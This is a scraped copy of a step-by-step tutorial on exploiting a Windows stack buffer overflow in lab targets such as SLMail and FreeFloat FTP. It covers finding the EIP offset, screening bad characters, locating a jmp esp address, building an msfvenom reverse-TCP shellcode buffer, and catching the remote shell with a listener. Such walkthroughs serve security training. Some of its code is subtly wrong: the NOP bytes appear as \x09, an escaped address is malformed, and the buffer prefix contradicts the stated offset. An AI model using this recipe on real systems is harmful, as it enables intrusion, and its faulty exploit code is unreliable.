windows buffer overflow exploitation walkthrough ... · windows buffer overflow exploitation...

5
Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering) 12 January 2018 Page 1 Windows Buffer Overflow Exploitation Walkthrough – Proprietary (Fuzzing + Reverse Engineering): NOTE: All Programs on Windows should be run with Administrative Privileges for best results. Each exploit attempt, the vulnerable service and debugger should be restarted. LEGAL: This guide is purely for educational purposes only. A couple of programs to test this out on in a virtual environment (for which I’d recommend Windows 7 x86) are: SLMail version 5.5, and FreeFloat FTP Server version 1. Public exploits are available to use; however, this guide can provide insight into the behind the scenes for those interested in digging a little deeper. ANALOGY: Before we get into the nitty gritty an analogy of a buffer overflow attack can help us to understand it better. A common analogy is an intersection with cars and traffic lights. (FIGURE 1): In a buffer overflow each register such as ESP is like a lane of traffic, and the EIP instruction pointer is like the traffic lights. Let’s say one of the lanes in the intersection is so full that the traffic lights decide to work in its favour to allow that traffic through. Imagine by doing this that lane manages to gain control over the entire intersection, this is similar to how a buffer overflow works. Let’s say that enough cars come through the intersection, that it affects the other traffic to the point where the traffic bleeds into the other sections of the intersection. This is why a buffer overflow attack normally leads to the whole application crashing, similar

Upload: others

Post on 29-May-2020

57 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Windows Buffer Overflow Exploitation Walkthrough ... · Windows Buffer Overflow Exploitation Walkthrough – Proprietary ... In a buffer overflow each register such as ESP is like

Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering)

12 January 2018 Page 1

Windows Buffer Overflow Exploitation Walkthrough – Proprietary (Fuzzing + Reverse Engineering):

NOTE: All Programs on Windows should be run with Administrative Privileges for best results. Each exploit attempt, the vulnerable service and debugger should be restarted. LEGAL: This guide is purely for educational purposes only. A couple of programs to test this out on in a virtual environment (for which I’d recommend Windows 7 x86) are: SLMail version 5.5, and FreeFloat FTP Server version 1. Public exploits are available to use; however, this guide can provide insight into the behind the scenes for those interested in digging a little deeper. ANALOGY: Before we get into the nitty gritty an analogy of a buffer overflow attack can help us to understand it better. A common analogy is an intersection with cars and traffic lights. (FIGURE 1):

In a buffer overflow each register such as ESP is like a lane of traffic, and the EIP instruction pointer is like the traffic lights. Let’s say one of the lanes in the intersection is so full that the traffic lights decide to work in its favour to allow that traffic through. Imagine by doing this that lane manages to gain control over the entire intersection, this is similar to how a buffer overflow works. Let’s say that enough cars come through the intersection, that it affects the other traffic to the point where the traffic bleeds into the other sections of the intersection. This is why a buffer overflow attack normally leads to the whole application crashing, similar

Page 2: Windows Buffer Overflow Exploitation Walkthrough ... · Windows Buffer Overflow Exploitation Walkthrough – Proprietary ... In a buffer overflow each register such as ESP is like

Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering)

12 January 2018 Page 2

to how at an intersection this would lead to gridlock. But let’s say by doing this we manage to actually change what the traffic lights do meaning some traffic may resort to going to a different destination than originally intended due to the gridlock. In a buffer overflow attack we could leverage this to send the traffic to a different destination where we can hijack the process, and try and use it to gain a remote access shell to the system. Similar to how criminals may leverage a situation like described at the traffic lights to divert a car that they wish to hijack. For reference, here is a list of the 32bit (x86) registers used in assembly code, similar to the 8 different lanes of traffic at our 4-way intersection, some coming into the intersection and others going away from the intersection.

Register: Description:

EAX Accumulator

EBX Base

ECX Counter

EDX Data

ESP Stack Pointer

EBP Stack Base Pointer

ESI Source

EDI Destination

This may seem overwhelming, but for now let’s just focus on the ESP register, notice how the ESP register is where the stack points to, so in a buffer overflow attack this is usually where the overflow goes. Even if you have never touched assembly before don’t be afraid. Hack to learn, don’t learn to hack remember? For testing purposes, I will be using Kali Linux (2017.3) for sending the exploit and the tools it provides me with. I will be debugging the windows application using Immunity Debugger. In Immunity Debugger, we can attach running processes and use the play button to continue running them in order for the debugger to pick up when the overflow occurs. Let’s assume we’ve established a Buffer Overflow vulnerability through a fuzzing process that sends more and more bytes to the vulnerable server, until we’ve established there Is a buffer overflow present. Once we’ve established how many bytes are enough to trigger the overflow, we can move onto the next step. As we are rewriting the EIP register, we need to work out the point where the buffer bleeds into the EIP register. We can do this using pattern_create.rb, which is a part of the Metasploit Framework. In the latest version of Kali Linux, which is 2017.3, this is located at /usr/share/metasploit-framework/tools/exploit/pattern_create.rb.

Page 3: Windows Buffer Overflow Exploitation Walkthrough ... · Windows Buffer Overflow Exploitation Walkthrough – Proprietary ... In a buffer overflow each register such as ESP is like

Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering)

12 January 2018 Page 3

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 2700

Now with the created text we can add it to our script, and send it to the vulnerable service. When the debugger pauses the crashed application, it reveals a new EIP register. We can copy the new EIP register to search for in our created pattern. Another script can help us out here: pattern_offset.rb.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 39694438

For example, let’s say it returns 2606 as the location, that’s where we can assume the overflow exists. In our program, we can now add 2606 A’s just as random text, followed by 4 B’s followed by 90 C’s to make sure our program reaches 2700. For reference here is A, B, and C in Hex:

ASCII HEX

A 41

B 42

C 43

If we run the updated script, sure enough EIP should equal the 4 B’s (42424242). Typical payloads are between 350 and 400 bytes long, so we should extend our C’s to check if we can accommodate the payload. Following the example extend the bytes from 2700 to 3500. The next thing we need to check for is bad characters, try commenting out the old bytes sent, and send all hex bytes to the server from %01 to %ff. Ignore %00 as null bytes are usually bad characters. POP3 also tends to not be friendly to carriage returns: %0d. Another similar character to carriage returns is the line feed character: %0a. Bad characters end up either truncated or mangled. Which means the characters are either halted at a certain point, with no characters to follow, or the byte doesn’t show up. Basically, if you don’t see everything from the first byte \x01 to \xff there is an issue. Refer to the full list of hex characters below. \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13 \x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26 \x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39 \x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c \x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f

Page 4: Windows Buffer Overflow Exploitation Walkthrough ... · Windows Buffer Overflow Exploitation Walkthrough – Proprietary ... In a buffer overflow each register such as ESP is like

Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering)

12 January 2018 Page 4

\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72 \x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85 \x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98 \x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab \xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe \xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1 \xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4 \xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7 \xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Now list the modules the program uses and pick one that is not using DEP or ASLR or any other internal security measures. If that is an issue for the vulnerability. For immunity debugger, we can add mona.py to the program and use it for this.

!mona modules

Select a .dll file that meets your needs. Within the chosen .dll list the jmp esp instructions, if none are returned in the search, try push esp, followed by retn as a sequence. In the rare event that these cannot be found in that specific .dll, broaden the search out to all usable areas. Sometimes we need to search for the opcode instead of the actual text. Immunity Debugger shows us what it is, but if you don’t have this as an option, using Nasm, an assembly code generator for Metasploit, which is found in the same directory and pattern_create.rb and pattern_offset.rb we can convert jmp esp to its equivalent opcode “FFE4.” To use nasm:

root@kali:/usr/share/metasploit-framework/tools/exploit# ./nasm_shell.rb nasm > jmp esp

For immunity debugger, again we can use mona.py for this.

!mona find -s “\xff\xe4” -m *.dll

Or we can use msfpescan:

root@kali:~# msfpescan -j vulnprogram.exe

We can use the same program to get pop commands too:

root@kali:~# msfpescan -p vulnprogram.exe

Page 5: Windows Buffer Overflow Exploitation Walkthrough ... · Windows Buffer Overflow Exploitation Walkthrough – Proprietary ... In a buffer overflow each register such as ESP is like

Windows Software Buffer Overflow Exploit Guide – Proprietary (Fuzz + Reverse Engineering)

12 January 2018 Page 5

Once we have a jmp esp command, we can copy the memory address and add that as the EIP register. When we do this in programming we need to use reverse hex. For example: 0b8c6c4c would become \x4c\x6c\x8c\0b. Ultimately the EIP will go to the jmp esp command which redirects the program to our C’s. Check this with a break point. We can now use msfvenom to create a payload (-p), if needed encode it with shikata_ga_nai (-e x86/shikata_ga_nai), and can be encoded multiple times with the iteration option (-i 3 (For 3 times.)), and output it into a C format that we can copy and paste into our script (-f c). We add to this any bad characters we have found (-b

parameter). This will also tell us how many bytes the payload is.

root@kali:~# msfvenom –p windows/shell/reverse_tcp -a x86 –platform windows LHOST=[LOCAL IP ADDRESS] LPORT=[LOCAL PORT] –b “\x00\x0a\x0d” –f c -e x86/shikata_ga_nai

Append the payload to the script along with some nops (\x90) to give some room for the payload to decode. Nop bytes basically just create space, and don’t do anything. Ultimately the buffer in our script should follow: buffer = [PRE-BUFFER] + [EIP-REGISTER] + [NOPS] +

[SHELLCODE] + [ADDITIONAL-CHARS]

Additional Chars are normally calculated, rather than specified for ease of use. i.e. Let’s say the original overflow was caused by 2700 bytes, and our payload was 360 bytes. buffer = “A”*200 + “\x4c\x6c\x8c\0b” + “\x09”*30 +

shellcode + “C”*(2700-360-30-4-200)

Notice how we deduct one by one each component of the buffer, to get the number of bytes for C. Set up either a Netcat listener or use exploit/multi/handler in Metasploit to await the incoming connection. When we execute our exploit we now should get a remote shell.